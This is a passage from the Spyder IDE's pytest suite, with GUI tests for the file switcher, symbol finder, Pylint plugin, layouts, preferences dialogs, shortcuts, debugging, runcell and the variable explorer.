# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(9000)
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(5000)
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
from spyder.plugins.pylint.main_widget import PylintWidgetActions
# Select the third-party plugin
pylint_plugin = get_thirdparty_plugin(main_window, "Code Analysis")
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = parse_version(pylint.__version__)
if pylint_version < parse_version('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
application_plugin = main_window.application
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
application_plugin.trouble_action.trigger()
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.layouts.plugins_menu.get_actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening tutorial with Help plugin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
"""Test that the report error dialog opens correctly."""
main_window.console.report_issue()
qtbot.wait(300)
assert main_window.console.get_widget()._report_dlg is not None
assert main_window.console.get_widget()._report_dlg.isVisible()
assert main_window.console.get_widget()._report_dlg.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.layouts.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in get_class_values(DefaultLayouts):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.layouts.setup_default_layouts(
layout_idx, settings=settings)
with qtbot.waitSignal(None, timeout=500, raising=False):
# Add a wait to see changes
pass
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="Fake plugin registration fails")
def test_programmatic_custom_layouts(main_window, qtbot):
"""
Test that a custom layout gets registered and it is recognized."""
mw = main_window
mw.first_spyder_run = False
# Test layout registration
layout_id = 'testing layout'
# Test the testing plugin is being loaded
mw.get_plugin('spyder_boilerplate')
# Get the registered layout
layout = mw.layouts.get_layout(layout_id)
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
mw.layouts.quick_layout_switch(layout_id)
with qtbot.waitSignal(None, timeout=500, raising=False):
# Add a wait to see changes
pass
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
for plugin in main_window.thirdparty_plugins:
if plugin.CONF_SECTION == 'pylint':
pylint_plugin = plugin
break
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create a editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
error_dialog = main_window.console.error_dialog
assert error_dialog is not None
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Continue debugging
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, '!q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
"""
Test for spyder-ide/spyder#13524 regression.
Ensure the Run section exists.
"""
assert preferences_dialog_helper(qtbot, main_window, 'run')
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10139 regression.
Enabling codestyle/docstyle on the completion section of preferences,
was not updating correctly.
"""
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
# Open completion prefences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'completions')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
for i in range(page.tabs.count())]
tabs = dict(zip(tnames, tabs))
tab_widgets = {
'code style and formatting': 'code_style_check',
'docstring style': 'docstring_style_check'
}
for tabname in tab_widgets:
tab, idx = tabs[tabname]
check_name = tab_widgets[tabname]
check = getattr(tab, check_name)
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10284 regression.
Changing font resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
not sys.platform.startswith('linux'),
reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#12992 regression.
Overwriting shortcuts results in a shortcuts conflict.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Setup shortcuts (set run cell and advance shortcut to run selection)
base_run_cell_advance = CONF.get_shortcut(
'editor', 'run cell and advance') # Should be Shift+Return
base_run_selection = CONF.get_shortcut(
'editor', 'run selection') # Should be F9
assert base_run_cell_advance == 'Shift+Return'
assert base_run_selection == 'F9'
CONF.set_shortcut(
'editor', 'run cell and advance', '')
CONF.set_shortcut(
'editor', 'run selection', base_run_cell_advance)
main_window.shortcuts.apply_shortcuts()
# Check execution of shortcut
# Create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(u'print(0)\nprint(ññ)')
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
assert u'ññ' not in shell._control.toPlainText()
# Reset shortcuts
CONF.set_shortcut(
'editor', 'run selection', 'F9')
CONF.set_shortcut(
'editor', 'run cell and advance', 'Shift+Return')
main_window.shortcuts.apply_shortcuts()
qtbot.wait(500) # Wait for shortcut change to actually be applied
# Check shortcut run cell and advance reset
code_editor.setFocus()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#11132 regression.
Resetting shortcut resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_provider('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last page is updated on re open
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: '!continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
if debug:
# Reach the 'name' input
shell.pdb_execute('!c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
"""Test the runcell command with leading indent."""
# Write code with a cell to a file
code = ("def a():\n return\nif __name__ == '__main__':\n"
"# %%\n print(1233 + 1)\n")
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
assert "1234" in shell._control.toPlainText()
assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.current_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
